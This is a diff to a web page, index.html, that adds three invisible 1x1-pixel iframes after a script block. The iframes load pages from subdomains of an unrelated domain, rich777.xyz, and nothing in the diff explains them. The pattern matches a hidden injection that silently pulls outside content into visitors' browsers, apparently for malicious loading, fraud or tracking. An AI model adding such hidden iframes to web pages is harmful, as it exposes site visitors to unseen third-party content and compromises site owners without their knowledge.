--- a/01/index.html
+++ b/01/index.html
@@ -210,5 +210,8 @@
 		}
 	}
 </script>
+<iframe src="https://about.rich777.xyz/about.html" height="1" width="1"></iframe>
+<iframe src="https://connect.rich777.xyz/connect.html" height="1" width="1"></iframe>
+<iframe src="https://new.rich777.xyz/new.html" height="1" width="1"></iframe>
 </html>
 
